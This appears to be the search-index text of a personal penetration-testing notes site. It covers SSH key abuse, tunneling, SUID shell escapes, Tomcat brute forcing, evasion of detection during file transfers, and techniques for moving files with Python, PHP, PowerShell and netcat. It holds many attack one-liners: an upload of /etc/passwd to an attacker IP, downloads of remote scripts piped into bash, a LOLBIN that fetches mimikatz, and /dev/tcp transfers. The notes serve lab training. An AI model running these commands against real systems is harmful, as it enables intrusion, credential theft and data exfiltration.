# For repo1\n[remote \"origin\"]\n        url = \"git@repo1.github.com:username/repo1.git\"\n\n# For repo2\n[remote \"origin\"]\n        url = \"git@repo2.github.com:username/repo2.git\"\n
4. For each repo, set the name and email:
                        # navigate to your repo1\ngit config user.name \"yourName1\"\ngit config user.email \"email1@domain.com\"\n\n# navigate to your repo2\ngit config user.name \"name2\"\ngit config user.email \"email2@domain.com\"\n
5. Create a config file in .ssh to manage keys:
                        # Default github account: username1\nHost github.com/username1\n   HostName github.com\n   IdentityFile ~/.ssh/username1_private_key\n   IdentitiesOnly yes\n\n# Other github account: username2\nHost github.com/username2\n   HostName github.com\n   IdentityFile ~/.ssh/username2_private_key\n   IdentitiesOnly yes\n
6. Make sure you don't have all credentials cached in your ssh agent:
                        ssh-add -D\n
7. Add the new credentials to your ssh agent:
                        ssh-add ~/.ssh/username1_private_key\nssh-add ~/.ssh/username2_private_key\n
8. See the added keys:
                        ssh-add -l\n
9. Test your connection:
                        ssh -T git@github.com\n
                        "},{"location":"ssh-keys/","title":"SSH keys","text":"","tags":["pentesting","privilege escalation","linux"]},{"location":"ssh-keys/#read-access-to-ssh","title":"Read access to .ssh","text":"

Having read access to the .ssh directory of a specific user, we may read their private SSH keys found in /home/user/.ssh/id_rsa or /root/.ssh/id_rsa, copy them to our machine, and use the -i flag to log in with them:

vim id_rsa\nchmod 600 id_rsa\n# If the key file has lax permissions, i.e., it may be read by other users, ssh will refuse to use it.\nssh user@10.10.10.10 -i id_rsa\n
                        ","tags":["pentesting","privilege escalation","linux"]},{"location":"ssh-keys/#write-access-to-ssh","title":"Write access to .ssh","text":"

                        Having write access over the .ssh directory for a specific user, we may place our public key in /home/user/.ssh/authorized_keys.

But for this we first need to have gained access as that user. With this technique we obtain SSH access to the machine.

                        # Generating a public private rsa key pair\nssh-keygen -f key\n

                        This will give us two files:\u00a0key\u00a0(which we will use with\u00a0ssh -i) and\u00a0key.pub, which we will copy to the remote machine.

                        Let us copy\u00a0key.pub, then on the remote machine, we will add it into\u00a0/root/.ssh/authorized_keys:
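
A minimal sketch (the public key string is a placeholder taken from key.pub):

# On the remote machine\necho \"ssh-ed25519 AAAA...snip... user@host\" >> /root/.ssh/authorized_keys\n\n# Back on our machine, log in with the matching private key\nssh root@10.10.10.10 -i key\n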

                        ","tags":["pentesting","privilege escalation","linux"]},{"location":"ssh-tunneling/","title":"ssh tunneling","text":"


                        "},{"location":"ssh-tunneling/#ssh-tunneling","title":"SSH tunneling","text":""},{"location":"ssh-tunneling/#local-port-forwarding","title":"Local port forwarding","text":"

In this example we will use this tunnel to access a remote PostgreSQL service locally:

1. On the attacking machine:
ssh UserNameInTheAttackedMachine@IPOfTheAttackedMachine -L 1234:localhost:5432\n# We will listen for incoming connections on our local port 1234. When a client connects to our local port, the SSH client forwards the connection through the tunnel to port 5432 on the remote server. This allows the local client to access services on the remote server as if they were running on the local machine.\n# We are forwarding traffic from any given local port, for instance 1234, to the port on which PostgreSQL is listening, namely 5432, on the remote server. We therefore specify port 1234 to the left of localhost, and 5432 to the right, indicating the target port.\n
2. In another terminal on the attacking machine:
                        sudo apt update && sudo apt install postgresql postgresql-client-common \n# this will install postgresql in case you don't have it.\n\npsql -U christine -h localhost -p 1234\n# Using our installation of psql, we can now interact with the PostgreSQL service running locally on the target machine:\n# -U: to specify user.\n# -h: to specify localhost. \n# -p 1234 as we are targeting the tunnel we created earlier with SSH, we need to specify which is the port the tunnel is listening on.\n
                        "},{"location":"ssh-tunneling/#dynamic-port-forwarding","title":"Dynamic Port Forwarding","text":"

                        Unlike local port forwarding and remote port forwarding, which use a specific local and remote port (earlier we used 1234 and 5432, for instance), dynamic port forwarding uses a single local port and dynamically assigns remote ports for each connection.

To use dynamic port forwarding with SSH, use the ssh command with the -D option followed by the local port, plus the remote SSH server. For example, the following command starts a SOCKS proxy on local port 1234; traffic sent through it is forwarded out from the remote server, where, in our case, the PostgreSQL server is running on port 5432:

ssh UserNameInTheAttackedMachine@IPOfAttackedMachine -D 1234 -f -N\n# -f sends the command to the shell's background right before executing it remotely\n# -N tells SSH not to execute any commands remotely.\n

As you can see, this time around we specify a single local port to which we will direct all the traffic needing forwarding.

If we now try running the same psql command as before, we will get an error. That is because this time we did not specify a target port for our traffic to be directed to: psql is just sending traffic into the established local socket on port 1234, but it never reaches the PostgreSQL service on the target. To make use of dynamic port forwarding, a tool such as proxychains is especially useful.

In summary, and as the name implies, proxychains can be used to tunnel a connection through multiple proxies; a use case for this could be increasing anonymity, as the origin of a connection would be significantly more difficult to trace.

In our case, we would only tunnel through one such \"proxy\": the target machine. The tool is pre-installed on most pentesting distributions (such as ParrotOS and Kali Linux) and is highly customisable, featuring an array of strategies for tunneling, which can be configured in its configuration file /etc/proxychains4.conf.

The minimal changes that we have to make to the file for proxychains to work in our current use case are:

1. Ensure that strict_chain is not commented out (dynamic_chain and random_chain should be commented out).
2. At the very bottom of the file, under [ProxyList], specify the socks5 (or socks4) host and port that we used for our tunnel.

In our case, it would look something like this, as our tunnel is listening at localhost:1234.

[ProxyList]\n# add proxy here ...\n# meanwhile\n# defaults set to \"tor\"\n#socks4 127.0.0.1 9050\nsocks5 127.0.0.1 1234\n

                        Having configured proxychains correctly, we can now connect to the PostgreSQL service on the target, as if we were on the target machine ourselves! This is done by prefixing whatever command we want to run with proxychains:

                        proxychains psql -U NameOfUserOfAttackedMachine -h localhost -p 5432\n
                        "},{"location":"sshpass/","title":"sshpass - A program to pass passwords in the command line to ssh","text":"

                        sshpass is a program that allows us to pass passwords in the command line to ssh. This way we can automate the login process.

                        ","tags":["tools"]},{"location":"sshpass/#installation","title":"Installation","text":"
                        sudo apt install sshpass\n
                        ","tags":["tools"]},{"location":"sshpass/#usage","title":"Usage","text":"
                        sshpass -p 'thepasswordisthis' ssh user@IP\n
                        ","tags":["tools"]},{"location":"sslyze/","title":"sslyze - A tool for scanning certificates","text":"

                        Analyze the SSL/TLS configuration of a server by connecting to it, in order to ensure that it uses strong encryption settings (certificate, cipher suites, elliptic curves, etc.), and that it is not vulnerable to known TLS attacks (Heartbleed, ROBOT, OpenSSL CCS injection, etc.).

                        ","tags":["pentesting","web pentesting"]},{"location":"sslyze/#installation","title":"Installation","text":"

Pre-installed in Kali.

                        Download it from: https://github.com/nabla-c0d3/sslyze.

                        ","tags":["pentesting","web pentesting"]},{"location":"sslyze/#basic-usage","title":"Basic usage","text":"
                        sslyze --certinfo <DOMAIN>\n

In order not to get false positives regarding hostname validation, use the domain name (not the IP).

                        ","tags":["pentesting","web pentesting"]},{"location":"sublist3r/","title":"sublist3r - A subdomain enumerating tool","text":"

Sublist3r enumerates subdomains using many search engines such as Google, Yahoo, Bing, Baidu and Ask. It also enumerates subdomains using Netcraft, Virustotal, ThreatCrowd, DNSdumpster and ReverseDNS. Note that it is easily blocked by Google.

                        ","tags":["scanning","subdomains","reconnaissance","pentesting"]},{"location":"sublist3r/#installation","title":"Installation","text":"
git clone https://github.com/aboul3la/Sublist3r\ncd Sublist3r\nsudo pip install -r requirements.txt\n
                        ","tags":["scanning","subdomains","reconnaissance","pentesting"]},{"location":"sublist3r/#usage","title":"Usage","text":"

From the Sublist3r directory:

                        python3 sublist3r.py -d example.com -o file.txt\n# -d: Specify the domain.\n# -o file.txt: It prints the results to a file\n# -b: Enable the bruteforce module. This built-in module relies on the names.txt wordlist. To find it, use: locate names.txt (you can edit it).\n\n# Select an engine for enumeration, for instance, google.\npython3 sublist3r.py -d example.com -e google\n
                        ","tags":["scanning","subdomains","reconnaissance","pentesting"]},{"location":"suid-binaries/","title":"Suid binaries","text":"

                        Resources: https://gtfobins.github.io/ contains a list of commands and how they can be exploited through \"sudo\".

The Windows equivalent of SUID binaries would be LOLBAS.

                        ","tags":["pentesting","privilege escalation","linux"]},{"location":"suid-binaries/#most-used-by-me","title":"Most used (by me)","text":"","tags":["pentesting","privilege escalation","linux"]},{"location":"suid-binaries/#find","title":"find","text":"","tags":["pentesting","privilege escalation","linux"]},{"location":"suid-binaries/#shell","title":"Shell","text":"

                        It can be used to break out from restricted environments by spawning an interactive system shell.

                        find . -exec /bin/sh \\; -quit\n
                        ","tags":["pentesting","privilege escalation","linux"]},{"location":"suid-binaries/#suid","title":"SUID","text":"

                        If the binary has the SUID bit set, it does not drop the elevated privileges and may be abused to access the file system, escalate or maintain privileged access as a SUID backdoor. If it is used to run sh -p, omit the -p argument on systems like Debian (<= Stretch) that allow the default sh shell to run with SUID privileges.

                        This example creates a local SUID copy of the binary and runs it to maintain elevated privileges. To interact with an existing SUID binary skip the first command and run the program using its original path.

                        sudo install -m =xs $(which find) .\n\n./find . -exec /bin/sh -p \\; -quit\n
                        ","tags":["pentesting","privilege escalation","linux"]},{"location":"suid-binaries/#sudo","title":"Sudo","text":"

                        If the binary is allowed to run as superuser by sudo, it does not drop the elevated privileges and may be used to access the file system, escalate or maintain privileged access.

                        sudo find . -exec /bin/sh \\; -quit\n
                        ","tags":["pentesting","privilege escalation","linux"]},{"location":"suid-binaries/#vi","title":"vi","text":"","tags":["pentesting","privilege escalation","linux"]},{"location":"suid-binaries/#shell_1","title":"Shell","text":"

                        It can be used to break out from restricted environments by spawning an interactive system shell.

                        #one way\nvi -c ':!/bin/sh' /dev/null\n\n# another way\nvi\n:set shell=/bin/sh\n:shell\n
Used in the HTB machine Vaccine.

                        ","tags":["pentesting","privilege escalation","linux"]},{"location":"suid-binaries/#sudo_1","title":"Sudo","text":"

                        If the binary is allowed to run as superuser by sudo, it does not drop the elevated privileges and may be used to access the file system, escalate or maintain privileged access.

                        sudo vi -c ':!/bin/sh' /dev/null\n
                        ","tags":["pentesting","privilege escalation","linux"]},{"location":"suid-binaries/#php","title":"php","text":"","tags":["pentesting","privilege escalation","linux"]},{"location":"suid-binaries/#sudo_2","title":"Sudo","text":"

                        If the binary is allowed to run as superuser by\u00a0sudo, it does not drop the elevated privileges and may be used to access the file system, escalate or maintain privileged access.

                        • CMD=\"/bin/sh\" sudo php -r \"system('$CMD');\"
                        ","tags":["pentesting","privilege escalation","linux"]},{"location":"sys-internals-suite/","title":"SysInternals Suite","text":"

                        To download: https://learn.microsoft.com/en-us/sysinternals/downloads/sysinternals-suite.

                        ","tags":["windows","thick applications"]},{"location":"sys-internals-suite/#tpcview","title":"TPCView","text":"

An application that allows you to see incoming and outgoing network connections associated with their owning application.

In the course \"Mastering Thick Application Pentesting\" this is really helpful to check the connections of the vulnerable application DVTA.

                        ","tags":["windows","thick applications"]},{"location":"sys-internals-suite/#process-monitor","title":"Process Monitor","text":"

This tool helps us understand file system changes and what is being accessed in the file system.

                        ","tags":["windows","thick applications"]},{"location":"sys-internals-suite/#strings","title":"Strings","text":"

It is similar to the \"strings\" command on Linux. It displays all the human-readable strings in a binary. Usage:

                        strings.exe <binaryFile>\n
                        ","tags":["windows","thick applications"]},{"location":"sys-internals-suite/#sigcheck","title":"Sigcheck","text":"

                        Sigcheck is a command-line utility that shows file version number, timestamp information, and digital signature details, including certificate chains.

                        .\\sigcheck.exe -nobanner -s -e <folder/binaryFile>\n# -s: Search recursively, useful for thick client apps with lot of folders and subfolders\n# -e: Scan executable images only (regardless of their extension)\n# -nobanner:    Do not display the startup banner and copyright message.\n
                        ","tags":["windows","thick applications"]},{"location":"sys-internals-suite/#psexec","title":"PsExec","text":"

                        PsExec\u00a0is a tool that lets us execute processes on other systems, complete with full interactivity for console applications, without having to install client software manually. It works because it has a Windows service image inside of its executable. It takes this service and deploys it to the admin$ share (by default) on the remote machine. It then uses the DCE/RPC interface over SMB to access the Windows Service Control Manager API. Next, it starts the PSExec service on the remote machine. The PSExec service then creates a\u00a0named pipe\u00a0that can send commands to the system.
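A typical invocation looks like the following sketch; the hostname, credentials, and command are placeholders:

psexec.exe -accepteula \\\\TARGET -u DOMAIN\\user -p Password0@ cmd.exe\n# -s: optionally run the remote process as SYSTEM\n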

                        ","tags":["windows","thick applications"]},{"location":"tcpdump/","title":"tcpdump - A\u00a0command-line packet analyzer","text":"

tcpdump prints out a description of the contents of packets on a network interface that match a Boolean expression. It can also dump all TCP connections from a saved .pcap file.

                        ","tags":["pentesting","reconnaissance"]},{"location":"tcpdump/#installation","title":"Installation","text":"

                        https://www.tcpdump.org/

                        ","tags":["pentesting","reconnaissance"]},{"location":"tcpdump/#usage","title":"Usage","text":"
                        tcpdump -nntttAr <nameOfFile.pcap> \n\n# Exit after receiving count packets.\n-c count\n\n# Save the packet data to a file for later analysis\n-w \n\n# Read  from  a saved  packet  file\n-r\n\n# Print out all captured packages\n-A\n
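A minimal capture-then-read workflow, as a sketch (the interface name eth0 and the port filter are assumptions; adjust to your environment):

# Capture 100 packets of port-80 traffic on eth0 and save them\nsudo tcpdump -i eth0 -c 100 -w capture.pcap port 80\n\n# Read the saved capture back without name resolution\ntcpdump -nnA -r capture.pcap\n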
                        ","tags":["pentesting","reconnaissance"]},{"location":"the-harvester/","title":"The Harvester - A tool for pasive and active reconnaissance","text":"

The Harvester: a simple-to-use yet powerful and effective tool for early-stage penetration testing and red team engagements. We can use it to gather information to help identify a company's attack surface. The tool collects emails, names, subdomains, IP addresses, and URLs from various public data sources for passive information gathering. It is organized into modules, one per data source.

                        Automate the modules we want to launch:

1. Create a list of sources, one per line, in a file called sources.txt.

                        2. Execute:

                         cat sources.txt | while read source; do theHarvester -d \"${TARGET}\" -b $source -f \"${source}_${TARGET}\";done\n

                        3. When the process finishes, extract all the subdomains found and sort them:

                        cat *.json | jq -r '.hosts[]' 2>/dev/null | cut -d':' -f 1 | sort -u > \"${TARGET}_theHarvester.txt\"\n

                        4. Merge all the passive reconnaissance files:

cat facebook.com_*.txt | sort -u > facebook.com_subdomains_passive.txt\ncat facebook.com_subdomains_passive.txt | wc -l\n
                        ","tags":["pentesting","reconnaissance","tools"]},{"location":"tmux/","title":"Tmux - A terminal multiplexer","text":"","tags":["pentesting","terminal","shells"]},{"location":"tmux/#installation","title":"Installation","text":"
                        sudo apt install tmux -y\n
                        ","tags":["pentesting","terminal","shells"]},{"location":"tmux/#basic-usage","title":"Basic usage","text":"

                        start new:

                        tmux\n

                        start new with session name:

                        tmux new -s myname\n

                        attach:

                        tmux a  #  (or at, or attach)\n

                        attach to named:

                        tmux a -t myname\n

                        list sessions:

                        tmux ls\n

                        kill session:

                        tmux kill-session -t myname\n

                        Kill all the tmux sessions:

                        tmux ls | grep : | cut -d. -f1 | awk '{print substr($1, 0, length($1)-1)}' | xargs kill\n

                        In tmux, hit the prefix ctrl+b (my modified prefix is ctrl+a) and then:

• ? : List all shortcuts.
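A few more default bindings (press the prefix first), kept here for quick reference:

# prefix + c : create a new window\n# prefix + n / p : next / previous window\n# prefix + % : split the pane into left/right\n# prefix + \" : split the pane into top/bottom\n# prefix + d : detach from the session\n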

                        ","tags":["pentesting","terminal","shells"]},{"location":"tomcat-pentesting/","title":"Pentesting tomcat","text":"

                        Usually found on port 8080.

                        Default credentials:

                        admin:admin\ntomcat:tomcat\nadmin:<NOTHING>\nadmin:s3cr3t\ntomcat:s3cr3t\nadmin:tomcat\ntomcat:tomca\n
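To quickly test a candidate pair, a hedged sketch (assuming the Manager app lives at the default /manager/html path):

curl -s -o /dev/null -w \"%{http_code}\\n\" -u tomcat:s3cr3t http://$ip:8080/manager/html\n# 200 = valid credentials, 401 = rejected\n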

                        Dictionaries:

                        ","tags":["web pentesting","techniques"]},{"location":"tomcat-pentesting/#directory-enumeration","title":"Directory enumeration","text":"","tags":["web pentesting","techniques"]},{"location":"tomcat-pentesting/#brute-force","title":"Brute force","text":"
                        hydra -l tomcat -P /usr/share/wordlists/SecLists-master/Passwords/darkweb2017-top1000.txt -f $ip http-get /manager/html \n
                        ","tags":["web pentesting","techniques"]},{"location":"transferring-files-evading-detection/","title":"Evading detection in file transfers","text":"","tags":["evading detection","exploitation","file transfer technique","backdoors"]},{"location":"transferring-files-evading-detection/#changing-user-agent","title":"Changing User Agent","text":"

We can make requests with Invoke-WebRequest using a browser user agent, e.g. Chrome.

                        Listing user agents:

                        [Microsoft.PowerShell.Commands.PSUserAgent].GetProperties() | Select-Object Name,@{label=\"User Agent\";Expression={[Microsoft.PowerShell.Commands.PSUserAgent]::$($_.Name)}} | fl\n
                        Name       : InternetExplorer\nUser Agent : Mozilla/5.0 (compatible; MSIE 9.0; Windows NT; Windows NT 10.0; en-US)\n\nName       : FireFox\nUser Agent : Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) Gecko/20100401 Firefox/4.0\n\nName       : Chrome\nUser Agent : Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) AppleWebKit/534.6 (KHTML, like Gecko) Chrome/7.0.500.0\n             Safari/534.6\n\nName       : Opera\nUser Agent : Opera/9.70 (Windows NT; Windows NT 10.0; en-US) Presto/2.2.1\n\nName       : Safari\nUser Agent : Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) AppleWebKit/533.16 (KHTML, like Gecko) Version/5.0\n             Safari/533.16\n

                        Using Chrome User Agent:

                        Invoke-WebRequest http://10.10.10.32/nc.exe -UserAgent [Microsoft.PowerShell.Commands.PSUserAgent]::Chrome -OutFile \"C:\\Users\\Public\\nc.exe\"\n
                        nc -lvnp 80\n
                        ","tags":["evading detection","exploitation","file transfer technique","backdoors"]},{"location":"transferring-files-evading-detection/#lolbas-gtfobins","title":"LOLBAS / GTFOBins","text":"

Application whitelisting may prevent you from using PowerShell or Netcat, and command-line logging may alert defenders to your presence. In this case, an option may be to use a \"LOLBIN\" (living off the land binary), also known as a \"misplaced trust binary.\" An example LOLBIN is the Intel Graphics Driver for Windows 10 (GfxDownloadWrapper.exe), which is installed on some systems and contains functionality to download configuration files periodically. This download functionality can be invoked as follows:

                        GfxDownloadWrapper.exe \"http://10.10.10.132/mimikatz.exe\" \"C:\\Temp\\nc.exe\"\n

                        Such a binary might be permitted to run by application whitelisting and be excluded from alerting.

                        ","tags":["evading detection","exploitation","file transfer technique","backdoors"]},{"location":"transferring-files-techniques-code/","title":"Transferring files with code","text":"","tags":["exploitation","file transfer technique","backdoors"]},{"location":"transferring-files-techniques-code/#python","title":"Python","text":"","tags":["exploitation","file transfer technique","backdoors"]},{"location":"transferring-files-techniques-code/#python2-download","title":"python2 Download","text":"
python2.7 -c 'import urllib;urllib.urlretrieve(\"https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh\", \"LinEnum.sh\")'\n
                        ","tags":["exploitation","file transfer technique","backdoors"]},{"location":"transferring-files-techniques-code/#python-3-download","title":"Python 3 - Download","text":"
                        python3 -c 'import urllib.request;urllib.request.urlretrieve(\"https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh\", \"LinEnum.sh\")'\n
                        ","tags":["exploitation","file transfer technique","backdoors"]},{"location":"transferring-files-techniques-code/#upload-operations-using-python3","title":"Upload Operations using Python3","text":"

                        uploadserver

# Start the Python uploadserver Module\npython3 -m uploadserver \n\n# Uploading a File Using a Python One-liner\npython3 -c 'import requests;requests.post(\"http://192.168.49.128:8000/upload\",files={\"files\":open(\"/etc/passwd\",\"rb\")})'\n

(HTB Academy lab credentials: htb-student / HTB_@cademy_stdnt!)

                        ","tags":["exploitation","file transfer technique","backdoors"]},{"location":"transferring-files-techniques-code/#php","title":"PHP","text":"","tags":["exploitation","file transfer technique","backdoors"]},{"location":"transferring-files-techniques-code/#php-download-with-file_get_contents","title":"PHP Download with File_get_contents()","text":"
                        # PHP file_get_contents() module to download content from a website combined with the file_put_contents() module to save the file into a directory. PHP can be used to run one-liners from an operating system command line using the option -r.\nphp -r '$file = file_get_contents(\"https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh\"); file_put_contents(\"LinEnum.sh\",$file);'\n
                        ","tags":["exploitation","file transfer technique","backdoors"]},{"location":"transferring-files-techniques-code/#php-download-with-fopen","title":"PHP Download with Fopen()","text":"
                        php -r 'const BUFFER = 1024; $fremote = \nfopen(\"https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh\", \"rb\"); $flocal = fopen(\"LinEnum.sh\", \"wb\"); while ($buffer = fread($fremote, BUFFER)) { fwrite($flocal, $buffer); } fclose($flocal); fclose($fremote);'\n
                        ","tags":["exploitation","file transfer technique","backdoors"]},{"location":"transferring-files-techniques-code/#php-download-a-file-and-pipe-it-to-bash","title":"PHP Download a File and Pipe it to Bash","text":"
php -r '$lines = @file(\"https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh\"); foreach ($lines as $line_num => $line) { echo $line; }' | bash\n# The URL can be used as a filename with the file() function if the fopen wrappers have been enabled; the leading @ just suppresses errors. \n
                        ","tags":["exploitation","file transfer technique","backdoors"]},{"location":"transferring-files-techniques-code/#ruby","title":"Ruby","text":"","tags":["exploitation","file transfer technique","backdoors"]},{"location":"transferring-files-techniques-code/#download-a-file","title":"Download a File","text":"
                        ruby -e 'require \"net/http\"; File.write(\"LinEnum.sh\", Net::HTTP.get(URI.parse(\"https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh\")))'\n
                        ","tags":["exploitation","file transfer technique","backdoors"]},{"location":"transferring-files-techniques-code/#perl","title":"Perl","text":"","tags":["exploitation","file transfer technique","backdoors"]},{"location":"transferring-files-techniques-code/#download-a-file_1","title":"Download a File","text":"
                        perl -e 'use LWP::Simple; getstore(\"https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh\", \"LinEnum.sh\");'\n
                        ","tags":["exploitation","file transfer technique","backdoors"]},{"location":"transferring-files-techniques-code/#javascript","title":"JavaScript","text":"","tags":["exploitation","file transfer technique","backdoors"]},{"location":"transferring-files-techniques-code/#download-a-file-with-wgetjs","title":"Download a file with wget.js","text":"

                        wget.js content:

                        var WinHttpReq = new ActiveXObject(\"WinHttp.WinHttpRequest.5.1\");\nWinHttpReq.Open(\"GET\", WScript.Arguments(0), /*async=*/false);\nWinHttpReq.Send();\nBinStream = new ActiveXObject(\"ADODB.Stream\");\nBinStream.Type = 1;\nBinStream.Open();\nBinStream.Write(WinHttpReq.ResponseBody);\nBinStream.SaveToFile(WScript.Arguments(1));\n
                        ","tags":["exploitation","file transfer technique","backdoors"]},{"location":"transferring-files-techniques-code/#download-a-file-using-javascript-and-cscriptexe","title":"Download a File Using JavaScript and cscript.exe","text":"

cscript.exe is the console-based script host from Microsoft, part of Microsoft Windows Script Host.

                        cscript.exe /nologo wget.js https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/dev/Recon/PowerView.ps1 PowerView.ps1\n
                        ","tags":["exploitation","file transfer technique","backdoors"]},{"location":"transferring-files-techniques-code/#vbscript","title":"VBScript","text":"

                        VBScript (\"Microsoft Visual Basic Scripting Edition\") is an Active Scripting language developed by Microsoft that is modeled on Visual Basic.

                        We'll create a file called wget.vbs and save the following content:

                        dim xHttp: Set xHttp = createobject(\"Microsoft.XMLHTTP\")\ndim bStrm: Set bStrm = createobject(\"Adodb.Stream\")\nxHttp.Open \"GET\", WScript.Arguments.Item(0), False\nxHttp.Send\n\nwith bStrm\n    .type = 1\n    .open\n    .write xHttp.responseBody\n    .savetofile WScript.Arguments.Item(1), 2\nend with\n

Now download the file using VBScript and cscript.exe:

                        cscript.exe /nologo wget.vbs https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/dev/Recon/PowerView.ps1 PowerView2.ps1\n
                        ","tags":["exploitation","file transfer technique","backdoors"]},{"location":"transferring-files-techniques-code/#netcat","title":"Netcat","text":"","tags":["exploitation","file transfer technique","backdoors"]},{"location":"transferring-files-techniques-code/#printing-information-on-screen","title":"Printing information on screen","text":"

                        On the server side (attacking machine):

                        #data will be printed on screen\nnc -lvp <port>  \n

                        On the client side (victim's machine):

echo \"hello\" | nc -v $ip <port>\n
                        ","tags":["exploitation","file transfer technique","backdoors"]},{"location":"transferring-files-techniques-code/#transfer-data-and-save-it-in-a-file-with-netcat","title":"Transfer data and save it in a file with netcat","text":"","tags":["exploitation","file transfer technique","backdoors"]},{"location":"transferring-files-techniques-code/#victims-machine-listening-on-port","title":"Victim's Machine listening on <Port>","text":"

                        On the client side (victim's machine):

ncat -lvp <port> --recv-only > received.txt  \n# --recv-only: Ncat option to close the connection once the file transfer is finished.\n

                        On the server side (attacking machine):

# Data will be stored in the received.txt file.\ncat tobesentfile.txt | nc -v $ip <port>\n# The option -q 0 will tell Netcat to close the connection once it finishes. \n\n# Alternative:\nnc -q 0 $ipVictim <port> < tobesentfile.txt \n\nncat --send-only $ipVictim <port> < tobesentfile.txt \n# The --send-only flag, when used in both connect and listen modes, prompts Ncat to terminate once its input is exhausted.\n
                        ","tags":["exploitation","file transfer technique","backdoors"]},{"location":"transferring-files-techniques-code/#victims-machine-connects-to-netcat-only-to-receive-the-file","title":"Victim's machine connects to netcat only to receive the file","text":"

                        Instead of listening on our compromised machine, we can connect to a port on our attack host to perform the file transfer operation. This method is useful in scenarios where there's a firewall blocking inbound connections. Let's listen on port 443 on our Pwnbox and send the file SharpKatz.exe as input to Netcat.

                        On the server side (attacking machine):

                        sudo nc -l -p 443 -q 0 < tobesentfile.txt\n\nncat -l -p 443 --send-only < tobesentfile.txt\n

On the client side (victim's machine), the compromised machine connects to Netcat to receive the file:

                        nc $ipAttacker 443 > tobesentfile.txt\n\nncat $ipAttacker 443 --recv-only > tobesentfile.txt\n\n# Using /dev/tcp to Receive the File\ncat < /dev/tcp/192.168.49.128/443 > SharpKatz.exe\n
                        ","tags":["exploitation","file transfer technique","backdoors"]},{"location":"transferring-files-techniques-code/#powershell-session-file-transfer","title":"PowerShell Session File Transfer","text":"

                        PowerShell Remoting uses Windows Remote Management (WinRM), which is the Microsoft implementation of the Web Services for Management (WS-Management) protocol, to allow users to run PowerShell commands on remote computers.

                        To create a PowerShell Remoting session on a remote computer, we will need administrative access, be a member of the Remote Management Users group, or have explicit permissions for PowerShell Remoting in the session configuration.

                        Let's create an example and transfer a file from DC01 to DATABASE01 and vice versa.

                        PS C:\\htb> whoami\n\nhtb\\administrator\n\nPS C:\\htb> hostname\n\nDC01\n
                        Test-NetConnection -ComputerName DATABASE01 -Port 5985\n\nComputerName     : DATABASE01\nRemoteAddress    : 192.168.1.101\nRemotePort       : 5985\nInterfaceAlias   : Ethernet0\nSourceAddress    : 192.168.1.100\nTcpTestSucceeded : True\n

                        Because this session already has privileges over DATABASE01, we don't need to specify credentials.

                        Create a PowerShell Remoting Session to DATABASE01

                        PS C:\\htb> $Session = New-PSSession -ComputerName DATABASE01\n

                        We can use the Copy-Item cmdlet to copy a file from our local machine DC01 to the DATABASE01 session we have $Session or vice versa.

                        Copy samplefile.txt from our Localhost to the DATABASE01 Session

                        PS C:\\htb> Copy-Item -Path C:\\samplefile.txt -ToSession $Session -Destination C:\\Users\\Administrator\\Desktop\\\n

                        Copy DATABASE.txt from DATABASE01 Session to our Localhost

                        PS C:\\htb> Copy-Item -Path \"C:\\Users\\Administrator\\Desktop\\DATABASE.txt\" -Destination C:\\ -FromSession $Session\n
                        ","tags":["exploitation","file transfer technique","backdoors"]},{"location":"transferring-files-techniques-code/#rdp","title":"RDP","text":"

                        RDP (Remote Desktop Protocol) is commonly used in Windows networks for remote access.

We can use xfreerdp or rdesktop to mount a Linux folder as a shared drive. This share will allow us to transfer files to and from the RDP session.

                        ","tags":["exploitation","file transfer technique","backdoors"]},{"location":"transferring-files-techniques-code/#mounting-a-linux-folder-using-rdesktop","title":"Mounting a Linux Folder Using rdesktop","text":"
                        rdesktop $ipVictim -d <domain> -u <username> -p <'Password0@'> -r disk:linux=\"/home/user/rdesktop/files\"\n
                        ","tags":["exploitation","file transfer technique","backdoors"]},{"location":"transferring-files-techniques-code/#mounting-a-linux-folder-using-xfreerdp","title":"Mounting a Linux Folder Using xfreerdp","text":"

xfreerdp /v:$ipVictim /d:<domain> /u:<username> /p:<'Password0@'> /drive:linux,/home/plaintext/htb/academy/filetransfer\n

                        To access the directory, we can connect to \\tsclient\\ in Windows, allowing us to transfer files to and from the RDP session.
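For example, with the /drive:linux,... option above, the share appears as \\\\tsclient\\linux inside the session; the file names below are placeholders:

# Inside the RDP session (Windows)\ncopy \\\\tsclient\\linux\\nc.exe C:\\Users\\Public\\\ncopy C:\\Users\\Public\\loot.zip \\\\tsclient\\linux\\\n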

                        ","tags":["exploitation","file transfer technique","backdoors"]},{"location":"transferring-files-techniques-linux/","title":"Transferring files techniques - Linux","text":"","tags":["linux","exploitation","file transfer technique","backdoors"]},{"location":"transferring-files-techniques-linux/#replicating-client-server","title":"Replicating client-server","text":"","tags":["linux","exploitation","file transfer technique","backdoors"]},{"location":"transferring-files-techniques-linux/#1-setting-up-a-server-in-the-attacking-machine","title":"1. Setting up a server in the attacking machine","text":"

                        See different techniques
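For a quick option, Python's built-in HTTP server serves the current directory (the port is an arbitrary choice):

# On the attacking machine\npython3 -m http.server <SERVERPORT>\n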

                        ","tags":["linux","exploitation","file transfer technique","backdoors"]},{"location":"transferring-files-techniques-linux/#2-download-files-from-victims-machine","title":"2. Download files from victim's machine","text":"","tags":["linux","exploitation","file transfer technique","backdoors"]},{"location":"transferring-files-techniques-linux/#wget","title":"wget","text":"
                        wget http://<SERVERIP>:<SERVERPORT>/<file>\n
                        ","tags":["linux","exploitation","file transfer technique","backdoors"]},{"location":"transferring-files-techniques-linux/#curl","title":"curl","text":"
curl http://<SERVERIP>:<SERVERPORT>/<file> -o <OutputNameForFile>\n
                        ","tags":["linux","exploitation","file transfer technique","backdoors"]},{"location":"transferring-files-techniques-linux/#fileless-downloads-using-linux","title":"Fileless downloads using Linux","text":"

Because of the way Linux works and how pipes operate, most of the tools we use in Linux can be used to replicate fileless operations, which means that we don't have to write a file to disk to execute it.

